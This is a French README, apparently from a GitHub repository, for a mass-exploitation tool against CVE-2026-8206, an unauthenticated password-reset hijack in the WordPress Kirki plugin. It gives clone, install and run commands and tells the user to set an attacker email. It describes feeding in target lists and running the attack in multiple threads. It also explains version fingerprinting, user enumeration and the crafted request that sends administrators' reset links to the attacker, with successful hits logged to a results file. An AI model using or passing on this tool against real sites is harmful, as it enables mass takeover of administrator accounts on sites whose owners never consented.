
Outil d'exploitation massive pour CVE-2026-8206 – Élévation de privilèges non authentifiée via 'handle_forgot_password' dans le plugin WordPress Kirki (≤6.0.6).
Outil d'exploitation massive pour CVE-2026-8206 – une vulnérabilité critique dans le plugin Kirki WordPress (versions ≤ 6.0.6) qui permet à des attaquants non authentifiés de détourner les liens de réinitialisation de mot de passe et de prendre le contrôle de n'importe quel compte utilisateur, y compris les administrateurs.
Le plugin Kirki expose un point de terminaison REST non authentifié (/wp-json/KirkiComponentLibrary/v1/kirki-forgot-password). En raison de l'absence de vérifications des permissions et d'une validation incorrecte des e-mails, un attaquant peut :
Versions affectées : ≤ 6.0.6
Version corrigée : 6.0.7
readme.txt et kirki.min.css (prend en charge les dossiers kirki et kirki-test)/wp-json/wp/v2/users (repli sur admin)requestsconcurrent.futures (rétroportage, généralement installé)Installer les dépendances :
pip install requests futures
git clone https://github.com/Jenderal92/CVE-2026-8206.git
cd CVE-2026-8206
Modifiez le script pour définir votre e-mail d'attaquant :
ATTACKER_EMAIL = "[email protected]" # line ~15
python CVE-2026-8206.py <targets_file> [threads]
<targets_file> – fichier texte avec un domaine par ligne (avec ou sans http:///https://)[threads] – optionnel, nombre de threads simultanés (par défaut : 15)python CVE-2026-8206.py targets.txt 20
targets.txt)example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
res.txt – contient les cibles exploitées avec succès au format :
URL|username|attacker_email|reset_link_sent_to_attacker_email
Exemple :
https://example.com|admin|[email protected]|reset_link_sent_to_attacker_email
La sortie console montre la progression en temps réel :
/wp-content/plugins/{kirki,kirki-test}/readme.txt (Stable tag) et /.../kirki.min.css (paramètre ver). Si la version ≤ 6.0.6, continuer./wp-json/wp/v2/users, si vide se rabat sur admin.username = nom d'utilisateur cibleemail = e-mail de l'attaquantemailBody = JSON qui inclut la puce reset_link200 et "Email sent", la cible est écrite dans res.txt.Ce logiciel est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. Toute utilisation non autorisée contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester est illégale. L'auteur n'est pas responsable de toute utilisation abusive ou des dommages causés par cet outil.
Pour plus d'avertissements, vous pouvez consulter l'avertissement sur la couverture de Jenderal92. Vous pouvez le vérifier ICI !!!